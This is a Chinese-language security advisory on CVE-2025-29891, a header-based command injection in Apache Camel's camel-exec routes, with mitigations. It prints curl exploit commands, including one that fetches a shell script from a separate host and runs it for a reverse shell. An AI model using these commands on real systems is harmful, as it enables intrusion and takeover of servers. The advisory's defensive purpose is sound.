概述

CVE-2025-29891是Apache Camel HTTP端点配置不当导致的远程命令注入漏洞。该漏洞源于CAmelExecCommandExecutable和CAmelExecCommandArgs头的不安全使用，可被利用来执行任意命令。影响能够与HTTP暴露的Camel路由交互的系统，特别是在安全加固薄弱或缺失的情况下。

CVE ID: CVE-2025-29891
严重程度: 中等
CVSS评分: 4.8
EPSS评分: 0.24%
影响: 远程代码执行
攻击向量: 网络
需要认证: 否
受影响组件: Apache Camel中的camel-exec路由

技术分析

Apache Camel支持通过头信息执行路由。当使用camel-exec组件时，它允许通过设置以下HTTP请求头来执行系统命令：

• CAmelExecCommandExecutable - 要运行的二进制文件（如curl、bash）
• CAmelExecCommandArgs - 传递给二进制文件的参数

如果系统暴露了使用camel-exec组件的HTTP端点，并且没有过滤或验证这些头信息，攻击者可以利用它们来在主机系统上执行任意命令。

利用条件

• Apache Camel实例必须暴露使用camel-exec的HTTP端点
• 攻击者必须能够向端点发送精心构造的HTTP请求
• CAmelExecCommandExecutable和CAmelExecCommandArgs头必须未被过滤或清理

漏洞利用

通过HTTP暴露此逻辑的路由配置错误可被武器化以远程发出命令。当与Web可访问端点（如/api/system-version）结合时，此行为变得至关重要。

例如，一个简单的sleep命令：

1
2
3

curl --header "CAmelExecCommandExecutable: sleep" \
     --header "CAmelExecCommandArgs: 5" \
     http://192.168.56.80:8080/api/system-version

或者用于反向shell的完整远程命令执行：

1
2
3

curl --header "CAmelExecCommandExecutable: curl" \
     --header "CAmelExecCommandArgs: 192.168.18.5:3333/rev.sh -o /tmp/rev.sh | bash /tmp/rev.sh" \
     http://192.168.56.80:8080/api/system-version

这些头信息被直接解释并在主机上执行，如果服务器允许出站连接，则启用完整shell访问。

缓解措施

• 不要通过公共可访问端点暴露camel-exec路由
• 在调用命令执行之前验证和清理头信息和输入
• 在敏感路由周围使用适当的身份验证和授权
• 除非绝对需要，否则考虑禁用或移除camel-exec组件
• 如果此CVE发布了修补版本，请升级Apache Camel
• 限制服务器的出站访问以防止反向shell或外部有效负载获取